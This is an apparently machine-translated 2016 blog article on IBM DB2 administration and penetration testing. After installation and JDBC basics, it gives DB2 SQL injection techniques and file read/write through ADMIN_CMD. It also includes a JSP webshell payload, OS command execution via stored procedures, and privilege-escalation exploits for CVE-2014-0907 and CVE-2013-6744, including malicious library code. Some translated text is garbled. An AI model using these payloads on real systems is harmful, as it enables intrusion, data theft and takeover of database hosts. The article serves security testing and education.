Wait for TA to come back · 2016/06/17 10:30

A brief introduction 0 x00 DB2

DB2 is IBM’s relational database management system.

DB2 today consists of three main families:

  • DB2 for Linux, UNIX and Windows(LUW)
  • DB2 for z/OS
  • DB2 for i(formerly OS/400)

IBM DB2 is targeted at the high end of the market and is widely used in enterprise applications

0x01 INSTALLATION of DB2

The following two sections describe the installation of DB2 on Linux and Windows respectively, both of which are V9.5 versions

DB2 installation under Linux

On Linux, DB2 relies on the compat-libstDC ++ library, which must be installed before installing DB2

After installing the above libraries, run db2setup in DB2 setup to launch the graphical installation interface

DB2 creates users db2inst1, db2fenc1, and dasusR1 during installation, and these users are added to the system as users of the system or can be created prior to installation

Once the installation is complete, switch to the db2inst1 user and run db2cc to start the graphical control center (DB2 does not include a graphical control center from V10.1 and can be managed from the command line or the Data Studio tool provided by IBM)

DB2 installation under Windows

Run the setup.exe program in setup to begin the installation, during which the db2admin user is created and added to the administrator group

Start the control center when installation is complete

0x02 Use of DB2

DB2 services and ports

You can use the following methods to view the DB2 service names and ports:

Linux:

The/etc/services fileCopy the code

Windows:

C: \ Windows \ System32 \ drivers \ etc \ services fileCopy the code

DB2 defaults to listening on connections on port 50000

DB2 users

All users of DB2 are operating system users, and the user password is bound to that user’s password on the operating system.

Under Linux, installing DB2 creates db2inst1, db2fenc1, and dasusr1 users. On Windows, the db2admin user is created and added to the administrator group.

Not all local operating system users are DB2 users. You need to add operating system users to database users in THE DB2 management function.

Local administration of DB2

Command-line mode

DB2 databases can be managed locally using command line or graphical tools

The IBM DB2 Universal Database (UDB) command Line processor (CLP) is a convenient interface for accessing DB2 functions that accept commands or SQL statements from the DB2 command line.

On Linux and UNIx-based systems, this command line is the command line for the DB2 instance.

In Windows, it is the command line with the CLP command window enabled. In this case, you must first run the db2cmd command (from a normal command window) to start the DB2 command line environment.

Cli in Windows:

Command line in Linux:

For details about how to use the command line, see IBM official documentation

GUI mode

You can use DB2’s control center to manage DB2 locally and graphically, as follows:

Windows:

Linux:

Note: DB2 does not include a graphical control center starting with V10.1 and can be replaced with DataStudio tools provided by IBM

Remote administration of DB2

You can remotely manage DB2 in either cli or GUI mode. To remotely manage DB2 in CLI mode, install the DB2 client, which can be downloaded from the IBM official website.

Remote graphical management can be done using the Quest Centor for DB2 tool. The DB2 client is also required to use the tool.

The tool can be used as follows:

Right-click to add DB2 server:

Configure the DB2 server address and operating system:

Configure the node name, instance name, and database port:

Right-click on the instance to manage login configure login credentials:

Right-click on an instance to add a database:

Condition after addition:

Execute SQL statement:

Connect to DB2 in a JAVA program

There are four ways for JAVA programs to connect to DB2: TYPE1, TYPE2, TYPE3, TYPE4, among which TYPE2 and TYPE4 are widely used. The basic architecture of the four ways is as follows:

TYPE1:

TYPE2:

TYPE3:

TYPE4:

The following describes how to connect to DB2 using TYPE2 and TYPE4

To use TYPE2, you must install DB2 client, add related databases and set aliases in the client, you can use the client command line or graphical tool “configuration assistant” to add, as shown in the following figure

There are two ways to use TYPE2 types:

Method one:

The driver is located in the db2jcc.jar package, and under Windows the JDK must have access to db2jdbc.dll and db2jcct2.dll. Db2jdbc.dll and db2jcct2.dll are located in the DB2 client program SQLLIB/BIN directory

The connection code is as follows:

#! java Class.forName("com.ibm.db2.jcc.DB2Driver").newInstance(); conn = DriverManager.getConnection("jdbc:db2:TESTDB2", "db2admin", "123456");Copy the code

TESTDB2 in JDBC: DB2 :TESTDB2 is the database alias added on the client

Method 2:

The driver is located in the db2java.zip package, and under Windows the JDK must have access to db2jdbc.dll, which is located in the DB2 client program SQLLIB/BIN directory

The connection code is as follows:

#! java Driver driver=(Driver) Class.forName("COM.ibm.db2.jdbc.app.DB2Driver").newInstance(); DriverManager.registerDriver(driver); conn = DriverManager.getConnection("jdbc:db2:TESTDB2", "db2admin", "123456");Copy the code

TESTDB2 in JDBC: DB2 :TESTDB2 is the database alias added on the client

Note: db2java.zip has been disabled in DB2 LUW 10.1, and it is recommended to use the db2jcc.jar driver if you want to use TYPE2 mode

Connect to DB2 methods using TYPE4:

The driver is in the db2jcc.jar package, and no additional programs need to be installed on the host of the application using this method

Connection code:

#! java Class.forName(com.ibm.db2.jcc.DB2Driver).newInstance(); Conn = DriverManager. GetConnection (JDBC: db2: / / 192.168.60.144:50000 / TESTDB2, made available, 123456);Copy the code

Note:

  1. TYPE4 The database code must be set to UTF-8. Otherwise, an error message is displayed
  2. TYPE4 also requires db2jcc_license_cu.jar

Jar, db2jcc_license_cu.jar, and db2java.zip where the preceding driver packages reside can be found in the DB2 server installation directory, for example, SQLLIB/ Java in the DB2 installation directory in Windows VERSION V9.5

The db2jcc.jar and db2java.zip drivers differ in error handling

When a query fails on the DB2 server side, the db2java.zip driver returns error messages generated by the DB2 server to the application as is, while the db2jcc.jar driver uses custom error messages.

Error message for db2java.zip:

Error message for db2jcc.jar:

0x03 PROBLEMS Related to DB2 SQL Injection

A statement to get DB2 database information

Get the database version:

#! sql SELECT service_level FROM table(sysproc.env_get_inst_info()) as instanceinfoCopy the code

Get current user:

#! sql SELECT user FROM sysibm.sysdummy1 SELECT session_user FROM sysibm.sysdummy1 SELECT system_user FROM sysibm.sysdummy1Copy the code

Get database user:

#! sql SELECT distinct(authid) FROM sysibmadm.privileges SELECT distinct(grantee) FROM sysibm.systabauthCopy the code

Obtain database table permissions:

#! sql SELECT * FROM syscat.tabauthCopy the code

Obtain the permissions of the current user:

#! sql SELECT * FROM syscat.tabauth where grantee = current userCopy the code

List the database DBA accounts:

#! sql SELECT distinct(grantee) FROM sysibm.systabauth where CONTROLAUTH='Y'Copy the code

Get the current database:

#! sql SELECT current server FROM sysibm.sysdummy1Copy the code

Get all tables in the current database:

#! sql SELECT table_name FROM sysibm.tables SELECT name FROM sysibm.systablesCopy the code

Get all columns in the current database:

#! sql SELECT name, tbname, coltype FROM sysibm.syscolumnsCopy the code

Obtain information about the host where the database resides:

#! sql SELECT * FROM sysibmadm.env_sys_infoCopy the code

DB2 SQL statement features

Comment:

DB2 databases use double hyphens — for single-line comments and /**/ for multi-line comments

SELECT * from ‘SELECT’;

#! sql SELECT * FROM sysibm.systables ORDER BY name ASC fetch first N rows onlyCopy the code

Truncated string:

#! SQL SELECT substr(' ABC ',2,1) FROM sysibm.sysdummy1Copy the code

The above statement results in the character b

Bit operation AND/OR/NOT/XOR

#! SQL SELECT bitand(1,0) FROM sysibm.sysdummy1Copy the code

The above statement will result in 0

Conversion between characters and ASCII:

#! sql SELECT chr(65) FROM sysibm.sysdummy1Copy the code

The above statement will get the character ‘A’

#! sql SELECT ascii('A') FROM sysibm.sysdummy1Copy the code

The above statement yields the ASCII code 65 for the character ‘A’

Type conversion:

#! sql SELECT cast('123' as integer) FROM sysibm.sysdummy1Copy the code

The above statement converts the string “123” to data 123

#! sql SELECT cast(1 as char) FROM sysibm.sysdummy1Copy the code

Convert the number 1 to the string “1”

String concatenation:

#! sql SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1 SELECT 'a' || 'b' || 'c' FROM sysibm.sysdummy1Copy the code

Both statements return the string “ABC”

Get length:

#! sql SELECT LENGTH(NAME) FROM SYSIBM.SYSCOLUMNS WHERE TBNAME='VOTE' ORDER BY NAME DESC FETCH FIRST 1 ROWS ONLYCopy the code

Conditional statement:

#! sql SELECT CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END FROM sysibm.sysdummy1Copy the code

The above statement will return the string ‘AAAAAAAAAA’

Time delay:

#! sql and (SELECT count(*) FROM sysibm.columns t1, sysibm.columns t2, Sysibm.columns t3)>0 and (SELECT ASCII (substr(user,1,1)) FROM sysibm.sysdummy1)=68Copy the code

The above statement will cause a delay if the first ASCII character of user is 68

The UNION operator:

DB2 supports the use of the UNION operator in SELECT statements, and the columns of the UNION must be of the same type to avoid errors.

And cannot use SELECT directly… The FROM… UNION SELECT NULL, NULL… The FROM… Methods. DB2 uses NULL in SELECT to specify the type as follows:

#! sql select ... cast(NULL as int) as column_A, cast(NULL as varchar(128)) as column_B, ... FROM ...Copy the code

Multi-statement query:

DB2 does not support statement1; Multi-statement query in the form of Statement2

SQL injection methods for DB2

A common approach to SQL injection into DB2 is to use blind injection, which is used to obtain database information from the previous two summaries.

Because of DB2’s more restrictive UNION operator, UNION injection is often unsuccessful. Because DB2 does not support multi-statement queries, there is no way to inject and invoke stored procedures through multi-statement query methods.

In addition, the error information of the database can be used to obtain some sensitive information through SQL injection, as follows:

Guess the number of columns using the general Order Derby method

Add group by 1 to the query condition — the ID of the first column in the table will be displayed, and then change the condition to group by ID– the NAME of the second column will be obtained. Add the column names after group by, such as group by ID, NAME, to enumerate all the columns in the current table

SQL injection tool for DB2

Sqlmap is relatively available in the SQL injection tool for DB2, as shown in the following screenshot:

However, it still has some problems after testing, such as incomplete obtaining column information and poor use of blind injection function

0x04 Reading and writing operating system files using DB2

In penetration testing, DB2 can be used to read and write system files, obtain sensitive information, write webshells, and so on.

The method described in this section was successfully tested under DB2 V9.5, Windows and Linux

Read operating system files using DB2

DB2 uses the IMPORT command to read from a file and insert it into a database table using:

#! sql IMPORT FROM C:\Windows\win.ini OF DEL INSERT INTO CONTENTCopy the code

Insert the contents of C:\Windows\win.ini into table CONTENT

DB2 ADMIN_CMD stored procedure is used to execute DB2 command line (CLP) commands. Its schema is SYSPROC. This stored procedure syntax was introduced in version 8.2.2:

#! sql ADMIN_CMD('command_string')Copy the code

The command_string argument is the command to run

To CALL a stored procedure, use the CALL statement with the syntax:

#! sql CALL ADMIN_CMD('command_string')Copy the code

Call the ADMIN_CMD stored procedure and execute the IMPORT command to read the file into the database table method:

#! sql CALL ADMIN_CMD('IMPORT FROM C:\Windows\win.ini OF DEL INSERT INTO CONTENT');Copy the code

The result of running the stored procedure:

Users remotely connected to the database can read the operating system files by calling the ADMIN_CMD stored procedure. As tested (DB2 V9.5), common database users have the permission to call the ADMIN_CMD stored procedure by default. Users remotely connected to the database can first create a table (or have INSERT and SELECT privileges on tables covered by existing IMPORT commands) and then call the ADMIN_CMD stored procedure to run the IMPORT command to read files into the created table. As follows:

Connect to the database remotely and call the ADMIN_CMD stored procedure to run the IMPORT command:

Read file information:

Write files to the operating system using DB2

The DB2 EXPORT command is used to import the contents of a database into a file using the following syntax:

#! sql EXPORT TO result.csv OF DEL MODIFIED BY NOCHARDEL SELECT col1, col2, coln FROM testtable;Copy the code

Run the command method using the ADMIN_CMD stored procedure mentioned in the previous section:

#! sql CALL SYSPROC.ADMIN_CMD ('EXPORT TO C:\RESULT.TXT OF DEL MODIFIED BY NOCHARDEL SELECT * FROM VOTENAME');Copy the code

Call procedure and result:

A user remotely connected to a database can create a table (or have SELECT permission on a table involved in the EXPORT command) and then call the ADMIN_CMD stored procedure to execute the EXPORT command to write a file to the operating system

The syntax for writing a file containing some strings to the operating system is as follows:

#! sql CALL SYSPROC.ADMIN_CMD ('EXPORT TO C:\RESULT.TXT OF DEL MODIFIED BY NOCHARDEL SELECT ''My Content'' FROM VOTENAME FETCH FIRST 1 ROWS ONLY');Copy the code

Result of remote call:

Use this method to write webshell syntax:

#! sql CALL SYSPROC.ADMIN_CMD ('EXPORT TO C:\RESULT.jsp OF DEL MODIFIED BY NOCHARDEL SELECT ''<%if(request.getParameter("f")! =null){(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("c").getByt es()); response.getWriter().print("[OK]"); }%>'' FROM VOTENAME FETCH FIRST 1 ROWS ONLY');Copy the code

Result of remote call:

Note: At least one record must exist in the SELECT table when the user-defined string content is written to the file through EXPORT; otherwise, the written content will be empty

0x05 Executing operating system commands using DB2

DB2 stored procedures can be used to execute operating system commands. The user who remotely connects to the database must have the permission to create a stored procedure. After connecting to the database, create a stored procedure that can execute operating system commands and invoke the procedure.

The syntax for creating and calling this stored procedure is as follows:

Windows:

#! sql CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200)) EXTERNAL NAME 'c:\windows\system32\msvcrt! system' LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL CALL db2_cmd_exec ('whoami /all > C:\whoami.log')Copy the code

Linux:

#! sql CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200)) EXTERNAL NAME '/usr/lib/libstdc++.so.6! system' LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL call db2_cmd_exec ('whoami > /tmp/whoami.log')Copy the code

Running results:

Note:

Stored procedures created by default are FENCED (protected). For example, for DB2 under Linux, the stored procedure is created and run by connecting to the database as user db2inst1, which is actually run on the DB2 server as user db2fenc1.

FENCED procedures enable a separate new address space, while UNFENCED procedures and the calling process use the same address space. FENCED procedures are generally safer.

To create NOTFENCED stored procedures (SYSADM privilege, DBADM privilege, or a special privilege (CREATE_NOT_FENCED)), you need to specify it during the creation of the stored procedure, as shown below

#! sql CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200)) EXTERNAL NAME '/usr/lib/libstdc++.so.6! system' LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL NOT FENCEDCopy the code

0x06 Leverage DB2 entitlement

This section introduces the principles and utilization methods of two DB2 rights raising vulnerabilities

CVE-2014-0907

Cve-2014-0907 is a DB2 native entitlement vulnerability that affects DB2 V9.5 on AIX, Linux, HP-UX, and Solaris (V9.5 before FP9 is not affected), V9.7, V10.1, and V10.5

Cve-2014-0907 vulnerability allows a common local user to obtain root permission

DB2’s db2iclean program searches for the libdb2ure2.so.1 library file in the current directory. As shown in the following figure, DB2 searches for the libdb2ure2.so

#! sql strace -o /tmp/db2iclean.log /home/db2inst1/sqllib/adm/db2icleanCopy the code

If there is a library file with the same name written by a malicious user in the current directory, the DB2 program loads the file and executes the code in it. Since the db2iclean command is SUID root, the malicious code is run as root.

For example, compile the following code into a library file and place it in the current directory:

#! cpp // libdb2ure2.cpp #include <stdlib.h> int iGetHostName(char* n, int i) { system("id > /m.log"); } $ gcc -shared -o libdb2ure2.so.1 libdb2ure2.cppCopy the code

Run the db2iclean program as a normal user of the db2IADM1 group:

#! sql <DB2_instance_install_directory>/adm/db2icleanCopy the code

The euID is 0 and the code is running as root

Note: Because db2iclean does not have public execute permissions, the attacker needs to execute using the db2IADM1 group of users, or trick members of that group into executing the program in a directory where the attacker has written malicious library files.

CVE-2013-6744

Cve-2013-6744 is a DB2 authorization vulnerability in Windows, which enables ordinary Windows users to obtain Administrator rights

DB2 versions with vulnerabilities:

  • 9.5, 9.7 FP9a before release
  • 10.1 Earlier versions of FP3a
  • 10.5 Earlier versions of FP3a

To exploit this vulnerability, a user with access to the DB2 database and permission to create external routines is required (CREATE_EXTERNAL_ROUTINE)

The DB2 service is not subject to access control checks by default on Windows platform privileged accounts, which means that a library file can be created and called with CREATE_EXTERNAL_ROUTINE permission to increase permissions.

Vulnerability utilization steps:

1. Run the following DDL as user CREATE_EXTERNAL_ROUTINE and use C Runtime system to create a stored procedure:

#! sql CREATE PROCEDURE db2_exec (IN cmd varchar(1024)) EXTERNAL NAME 'msvcrt! system' LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQLCopy the code

2. Call the stored procedure you just created:

#! sql CALL db2_exec('whoami /all > C:\whoami.log')Copy the code

Look at the whoami.log file created by the command and find that it contains db2admin information. This means that we successfully executed the command with administrator privileges using a non-administrator account.

0 x07 reference

  • En.wikipedia.org/wiki/IBM_DB…
  • www.ibm.com/developerwo…
  • www.sqlinjectionwiki.com/Categories/…
  • Www-01.ibm.com/support/doc…
  • Blog.spiderlabs.com/2014/07/abo…